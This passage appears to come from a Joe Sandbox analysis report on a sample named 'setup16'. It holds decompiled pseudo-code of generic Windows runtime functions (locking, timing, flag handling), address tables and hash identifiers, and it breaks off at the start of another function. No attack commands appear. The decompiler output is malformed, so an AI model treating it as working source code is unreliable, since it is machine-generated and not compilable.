                                                                                                                                                                                                        			E04A8AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04A8C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04A8ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E04A8FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04A8EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E049E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04A81608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04A91536(0x4ab8ae4, (_t74 -  *0x4ab8b04 >> 0x14) + (_t74 -  *0x4ab8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L04A8C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E04A8A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04A6CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E04A8ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                                                                                                                        0x04a8ae44
                                                                                                                                                                                                        0x04a8ae4c
                                                                                                                                                                                                        0x04a8ae53
                                                                                                                                                                                                        0x04a8ae55
                                                                                                                                                                                                        0x04a8ae5c
                                                                                                                                                                                                        0x04a8ae64
                                                                                                                                                                                                        0x04a8ae68
                                                                                                                                                                                                        0x04a8ae75
                                                                                                                                                                                                        0x04a8ae75
                                                                                                                                                                                                        0x04a8ae78
                                                                                                                                                                                                        0x04a8ae7a
                                                                                                                                                                                                        0x04a8ae7c
                                                                                                                                                                                                        0x04a8ae7f
                                                                                                                                                                                                        0x04a8aea8
                                                                                                                                                                                                        0x04a8aeab
                                                                                                                                                                                                        0x04a8aead
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8aeb3
                                                                                                                                                                                                        0x04a8aeb8
                                                                                                                                                                                                        0x04a8aebb
                                                                                                                                                                                                        0x04a8aebd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8ae81
                                                                                                                                                                                                        0x04a8ae88
                                                                                                                                                                                                        0x04a8ae8f
                                                                                                                                                                                                        0x04a8ae9b
                                                                                                                                                                                                        0x04a8ae96
                                                                                                                                                                                                        0x04a8ae96
                                                                                                                                                                                                        0x04a8ae96
                                                                                                                                                                                                        0x04a8aea0
                                                                                                                                                                                                        0x04a8aea3
                                                                                                                                                                                                        0x04a8aebf
                                                                                                                                                                                                        0x04a8aebf
                                                                                                                                                                                                        0x04a8aec3
                                                                                                                                                                                                        0x04a8aec9
                                                                                                                                                                                                        0x04a8af0d
                                                                                                                                                                                                        0x04a8af14
                                                                                                                                                                                                        0x04a8af3d
                                                                                                                                                                                                        0x04a8af3d
                                                                                                                                                                                                        0x04a8af41
                                                                                                                                                                                                        0x04a8af44
                                                                                                                                                                                                        0x04a8af67
                                                                                                                                                                                                        0x04a8af67
                                                                                                                                                                                                        0x04a8af6a
                                                                                                                                                                                                        0x04a8afca
                                                                                                                                                                                                        0x04a8afd1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8afd1
                                                                                                                                                                                                        0x04a8af6c
                                                                                                                                                                                                        0x04a8af6d
                                                                                                                                                                                                        0x04a8af75
                                                                                                                                                                                                        0x04a8af7c
                                                                                                                                                                                                        0x04a8af7e
                                                                                                                                                                                                        0x04a8af80
                                                                                                                                                                                                        0x04a8af85
                                                                                                                                                                                                        0x04a8af87
                                                                                                                                                                                                        0x04a8af99
                                                                                                                                                                                                        0x04a8af89
                                                                                                                                                                                                        0x04a8af92
                                                                                                                                                                                                        0x04a8af92
                                                                                                                                                                                                        0x04a8af9e
                                                                                                                                                                                                        0x04a8afa1
                                                                                                                                                                                                        0x04a8afa3
                                                                                                                                                                                                        0x04a8afa9
                                                                                                                                                                                                        0x04a8afb0
                                                                                                                                                                                                        0x04a8afb2
                                                                                                                                                                                                        0x04a8afb4
                                                                                                                                                                                                        0x04a8afbc
                                                                                                                                                                                                        0x04a8afbc
                                                                                                                                                                                                        0x04a8afb4
                                                                                                                                                                                                        0x04a8afb0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8afa1
                                                                                                                                                                                                        0x04a8af4f
                                                                                                                                                                                                        0x04a8af57
                                                                                                                                                                                                        0x04a8af5c
                                                                                                                                                                                                        0x04a8af5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8af60
                                                                                                                                                                                                        0x04a8af64
                                                                                                                                                                                                        0x04a8af64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8af64
                                                                                                                                                                                                        0x04a8af1a
                                                                                                                                                                                                        0x04a8af25
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8af27
                                                                                                                                                                                                        0x04a8af28
                                                                                                                                                                                                        0x04a8af33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8aed0
                                                                                                                                                                                                        0x04a8aed0
                                                                                                                                                                                                        0x04a8aed2
                                                                                                                                                                                                        0x04a8aee1
                                                                                                                                                                                                        0x04a8aee4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8aee6
                                                                                                                                                                                                        0x04a8aeec
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8aefb
                                                                                                                                                                                                        0x04a8af07
                                                                                                                                                                                                        0x04a8afd3
                                                                                                                                                                                                        0x04a8afdb
                                                                                                                                                                                                        0x04a8afdb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8af07
                                                                                                                                                                                                        0x04a8aed6
                                                                                                                                                                                                        0x04a8aed8
                                                                                                                                                                                                        0x04a8aedf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a8aedf
                                                                                                                                                                                                        0x04a8aec9

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d5990a162e807a068537578539f2af3cb0bbe38f067bf631fc754ff9f513b4a4
                                                                                                                                                                                                        • Instruction ID: 19699b414edf7a8d8e7101eb950222a23929e641293cb0dcef5a6b2dd32fd70c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5990a162e807a068537578539f2af3cb0bbe38f067bf631fc754ff9f513b4a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41F6B17006119BEB2AFB29C884B7BB799EF84724F04861EF856872D1DB34FC01C691
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EDBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E049EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E049CCC50(E049C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E049E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04A98ED6(_t102, _t98);
						}
						_t76 = _v44;
						E049E2280(_t58, _v44);
						E049EDD82(_v44, _t102, _t98);
						E049EB944(_t102, _v5);
						return E049DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4ab8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4ab862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4ab8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4ab862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4a8fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                                                                                                                        0x049edbe9
                                                                                                                                                                                                        0x049edbf2
                                                                                                                                                                                                        0x049edbf7
                                                                                                                                                                                                        0x049edbf9
                                                                                                                                                                                                        0x049edbfc
                                                                                                                                                                                                        0x049edc00
                                                                                                                                                                                                        0x049edc03
                                                                                                                                                                                                        0x049edc14
                                                                                                                                                                                                        0x049edd54
                                                                                                                                                                                                        0x049edd54
                                                                                                                                                                                                        0x049edd54
                                                                                                                                                                                                        0x049edc18
                                                                                                                                                                                                        0x049edc1d
                                                                                                                                                                                                        0x049edc1d
                                                                                                                                                                                                        0x049edc32
                                                                                                                                                                                                        0x049edc3b
                                                                                                                                                                                                        0x049edc3e
                                                                                                                                                                                                        0x049edc46
                                                                                                                                                                                                        0x049edd5b
                                                                                                                                                                                                        0x049edd62
                                                                                                                                                                                                        0x049edd64
                                                                                                                                                                                                        0x049edd67
                                                                                                                                                                                                        0x049edd69
                                                                                                                                                                                                        0x049edd6b
                                                                                                                                                                                                        0x049edd6e
                                                                                                                                                                                                        0x049edd70
                                                                                                                                                                                                        0x049edd73
                                                                                                                                                                                                        0x049edd73
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049edc4c
                                                                                                                                                                                                        0x049edc4e
                                                                                                                                                                                                        0x04a33ae3
                                                                                                                                                                                                        0x04a33ae8
                                                                                                                                                                                                        0x04a33aea
                                                                                                                                                                                                        0x049edce7
                                                                                                                                                                                                        0x049edce9
                                                                                                                                                                                                        0x049edcec
                                                                                                                                                                                                        0x049edcee
                                                                                                                                                                                                        0x049edcf0
                                                                                                                                                                                                        0x049edcf3
                                                                                                                                                                                                        0x049edcf5
                                                                                                                                                                                                        0x04a33af2
                                                                                                                                                                                                        0x04a33af5
                                                                                                                                                                                                        0x04a33af5
                                                                                                                                                                                                        0x049edd06
                                                                                                                                                                                                        0x049edd08
                                                                                                                                                                                                        0x049edd0b
                                                                                                                                                                                                        0x049edd12
                                                                                                                                                                                                        0x04a33b08
                                                                                                                                                                                                        0x049edd18
                                                                                                                                                                                                        0x049edd18
                                                                                                                                                                                                        0x049edd18
                                                                                                                                                                                                        0x049edd20
                                                                                                                                                                                                        0x049edd23
                                                                                                                                                                                                        0x04a33b16
                                                                                                                                                                                                        0x04a33b16
                                                                                                                                                                                                        0x049edd29
                                                                                                                                                                                                        0x049edd2d
                                                                                                                                                                                                        0x049edd36
                                                                                                                                                                                                        0x049edd40
                                                                                                                                                                                                        0x049edd51
                                                                                                                                                                                                        0x049edd51
                                                                                                                                                                                                        0x049edc54
                                                                                                                                                                                                        0x049edc59
                                                                                                                                                                                                        0x049edc59
                                                                                                                                                                                                        0x049edc5e
                                                                                                                                                                                                        0x049edc5e
                                                                                                                                                                                                        0x049edc63
                                                                                                                                                                                                        0x049edc66
                                                                                                                                                                                                        0x049edc6b
                                                                                                                                                                                                        0x049edc78
                                                                                                                                                                                                        0x049edc7b
                                                                                                                                                                                                        0x049edc81
                                                                                                                                                                                                        0x049edc81
                                                                                                                                                                                                        0x049edc83
                                                                                                                                                                                                        0x049edc89
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049edd7b
                                                                                                                                                                                                        0x049edd7b
                                                                                                                                                                                                        0x049edc8f
                                                                                                                                                                                                        0x049edc8f
                                                                                                                                                                                                        0x049edc92
                                                                                                                                                                                                        0x049edc99
                                                                                                                                                                                                        0x049edc9f
                                                                                                                                                                                                        0x049edca5
                                                                                                                                                                                                        0x049edcaa
                                                                                                                                                                                                        0x049edcaa
                                                                                                                                                                                                        0x049edcb3
                                                                                                                                                                                                        0x049edcb8
                                                                                                                                                                                                        0x049edcbb
                                                                                                                                                                                                        0x049edcc1
                                                                                                                                                                                                        0x049edccf
                                                                                                                                                                                                        0x049edcd2
                                                                                                                                                                                                        0x049edcd5
                                                                                                                                                                                                        0x049edcd7
                                                                                                                                                                                                        0x049edcda
                                                                                                                                                                                                        0x049edcdc
                                                                                                                                                                                                        0x049edcdc
                                                                                                                                                                                                        0x049edce2
                                                                                                                                                                                                        0x049edce4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049edce4

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b2d70e1819be8dcd857a378063add1fa544f976e3d7cd55bacfcec1ab21c958d
                                                                                                                                                                                                        • Instruction ID: cc09be563b8af85b43efa91e2a1239bcbc1ac36c7724b76a3db64e12fd0f5891
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2d70e1819be8dcd857a378063add1fa544f976e3d7cd55bacfcec1ab21c958d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6251B171A01206DFCB15CF69C4906AEFBF5FB48350F20866AD955A7340EB35F984CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049DEF40 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E049DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E049C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E049C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                                                                                                        0x049def4b
                                                                                                                                                                                                        0x049def4d
                                                                                                                                                                                                        0x049def57
                                                                                                                                                                                                        0x049df0bd
                                                                                                                                                                                                        0x049df0c2
                                                                                                                                                                                                        0x049df0d2
                                                                                                                                                                                                        0x049df0d2
                                                                                                                                                                                                        0x049df0c2
                                                                                                                                                                                                        0x049def5d
                                                                                                                                                                                                        0x049def5f
                                                                                                                                                                                                        0x049def67
                                                                                                                                                                                                        0x049def6a
                                                                                                                                                                                                        0x049def6d
                                                                                                                                                                                                        0x049def74
                                                                                                                                                                                                        0x049def7f
                                                                                                                                                                                                        0x049def82
                                                                                                                                                                                                        0x049def82
                                                                                                                                                                                                        0x049def86
                                                                                                                                                                                                        0x049def88
                                                                                                                                                                                                        0x049def8c
                                                                                                                                                                                                        0x049def8f
                                                                                                                                                                                                        0x049def8f
                                                                                                                                                                                                        0x049def8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049def91
                                                                                                                                                                                                        0x049def93
                                                                                                                                                                                                        0x049defc4
                                                                                                                                                                                                        0x049defc4
                                                                                                                                                                                                        0x049defc4
                                                                                                                                                                                                        0x049defca
                                                                                                                                                                                                        0x049defd0
                                                                                                                                                                                                        0x049df0a6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df0af
                                                                                                                                                                                                        0x04a2bb06
                                                                                                                                                                                                        0x04a2bb0a
                                                                                                                                                                                                        0x049df0b5
                                                                                                                                                                                                        0x049df0b5
                                                                                                                                                                                                        0x049df0b5
                                                                                                                                                                                                        0x049df0b5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049defd6
                                                                                                                                                                                                        0x049defd9
                                                                                                                                                                                                        0x049df0de
                                                                                                                                                                                                        0x049df0e2
                                                                                                                                                                                                        0x049defdf
                                                                                                                                                                                                        0x049defdf
                                                                                                                                                                                                        0x049defdf
                                                                                                                                                                                                        0x049defe5
                                                                                                                                                                                                        0x04a2bafc
                                                                                                                                                                                                        0x04a2bafc
                                                                                                                                                                                                        0x049defe5
                                                                                                                                                                                                        0x049defeb
                                                                                                                                                                                                        0x049defed
                                                                                                                                                                                                        0x049df00f
                                                                                                                                                                                                        0x049df011
                                                                                                                                                                                                        0x049df01a
                                                                                                                                                                                                        0x049df01d
                                                                                                                                                                                                        0x049df021
                                                                                                                                                                                                        0x049df028
                                                                                                                                                                                                        0x049df029
                                                                                                                                                                                                        0x049df029
                                                                                                                                                                                                        0x049df02c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df02c
                                                                                                                                                                                                        0x049deff3
                                                                                                                                                                                                        0x049deff9
                                                                                                                                                                                                        0x049df0ea
                                                                                                                                                                                                        0x049df0ed
                                                                                                                                                                                                        0x049df0ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df0ef
                                                                                                                                                                                                        0x049df003
                                                                                                                                                                                                        0x04a2bb12
                                                                                                                                                                                                        0x049df045
                                                                                                                                                                                                        0x049df049
                                                                                                                                                                                                        0x049df051
                                                                                                                                                                                                        0x049df09e
                                                                                                                                                                                                        0x049df0a0
                                                                                                                                                                                                        0x049df0a0
                                                                                                                                                                                                        0x049df09e
                                                                                                                                                                                                        0x049df053
                                                                                                                                                                                                        0x049df064
                                                                                                                                                                                                        0x049df064
                                                                                                                                                                                                        0x049df06b
                                                                                                                                                                                                        0x04a2bb1a
                                                                                                                                                                                                        0x04a2bb1a
                                                                                                                                                                                                        0x049df071
                                                                                                                                                                                                        0x049df071
                                                                                                                                                                                                        0x049df07d
                                                                                                                                                                                                        0x049df082
                                                                                                                                                                                                        0x049df08f
                                                                                                                                                                                                        0x049df08f
                                                                                                                                                                                                        0x049df009
                                                                                                                                                                                                        0x049df00d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df00d
                                                                                                                                                                                                        0x049defd0
                                                                                                                                                                                                        0x049def97
                                                                                                                                                                                                        0x049defa5
                                                                                                                                                                                                        0x049defaa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049defac
                                                                                                                                                                                                        0x049defac
                                                                                                                                                                                                        0x049defac
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049defb2
                                                                                                                                                                                                        0x049df036
                                                                                                                                                                                                        0x049df03a
                                                                                                                                                                                                        0x049df040
                                                                                                                                                                                                        0x049df090
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df092
                                                                                                                                                                                                        0x049df042
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049df042
                                                                                                                                                                                                        0x049defb7
                                                                                                                                                                                                        0x049defb9
                                                                                                                                                                                                        0x049defbc
                                                                                                                                                                                                        0x049defb0
                                                                                                                                                                                                        0x049defb0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049defbe
                                                                                                                                                                                                        0x049defbe
                                                                                                                                                                                                        0x049defc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049defc1
                                                                                                                                                                                                        0x049defbc
                                                                                                                                                                                                        0x049defaa
                                                                                                                                                                                                        0x049def91

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                                                                                        • Instruction ID: 527009240d0d4083eb2fc6b22538e76cdf0a4aaee0905946ccbc15ad83df2b11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F51FF30A04649EFDF28CF68C1C17AEBBB6AF05314F18C1B8D5469B281D376B989D791
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A9740D Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E04A9740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
